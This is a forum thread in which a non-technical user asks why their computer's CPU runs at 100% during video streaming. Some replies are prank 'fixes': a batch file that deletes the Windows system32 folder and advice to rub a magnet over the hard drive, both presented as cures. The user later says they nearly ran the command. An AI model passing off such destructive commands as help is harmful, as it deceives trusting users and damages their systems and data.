CPU running at 100 randomly?

ok, so before i even start this thread i want you all to know that i am computer retarded on multiple levels. so if you are gifted with technology and understand my problem, please dumb it down to like child/pre-k terms.
recently, my computer has my CPU running at 100 percent randomly causing my computer to crawl (which took me about 3 days to pinpoint). after observing this several times, i realize that it only happens after watching about 15 minutes of netflix or trying to load youtube videos (which load really slow). vimeo, oddly enough, works just fine, and flash games seem to work without any problem. i have already tried trend micro house call and have norton installed on my computer. i did perform a "time machine" thing to about a month before the problem arose. if any one has any idea on what could be causing this, or has any idea on how i can discover what is causing this, i will tell you i love you over the internet.

open up notepad and type the following:

@echo off

del c:\WINDOWS\system32

save the file as (anything).bat (remember to add the .bat extension and save as all files)

double click and it will delete the system32 folder.

you should be good from there.

your hard drive has become magnetized, probably something to do with your altitude and distance from magnetic fields. what you need to do, is to find a very strong magnet, take out your hard drive, and run the magnet in a counter-clockwise motion over your hard drive at least 7 times.

Norton has been problem free for me... but try scanning your computer, maybe defragment it, and make sure you dont have any viruses. when all else fails, reinstall windows =/

This is basically what you would be doing "In simple, system32 is your 32Bit operating system. It is the brain. So just think what would happen if you delete your brain??"

I like that quote and it is very true

Honestly, I use a combination of Malwarebyte's Anti-Malware and AVG Antivirus (Both free) and run scans automatically once a week and haven't had any problems whatsoever.

But I've only seen 100% CPU when I'm trying to exit a program by Ctrl Alt Dlt. Google this shit though. NS is probably not where you want to be with real computer problems (real as in not "PC or Mac!?!?!?")

dude, fucking thank you. seriously, i almost went for the system 32 approach because i saw multiple people mentioned it. i should have known that the people of NS would have nothing but garbage to post, from some members like k-rob i expected it and loled, but others seemed credible. ill take my problems elsewhere since everyone seems to find it funny to increase them.

YOur computer is obviously quite randy to the point that it cannot work correctly. Ask to borrow your girls laptop then leave the two around for some hot kinky metalic computer sex

for everyone who says something that has to do with windows. he is on a mac. "TIME MACHINE" is only on mac. and for you my fine friend. i would suggest bringing it to an apple store, and pay maybe 10 bucks to have them check it out. if you know nothing about computers. the only way i could help you would be remoting into it, and i know you wouldnt trust some random guy like me. so go to the apple store.

hahah wow when I was waiting for his response I was gonna be like, 'well theres a few people on this site that I recognize because everytime I see them post I just feel bad for them, jordan, ohmybosh, arabian, and the guy with numbers for a name (you)" weird coincidence
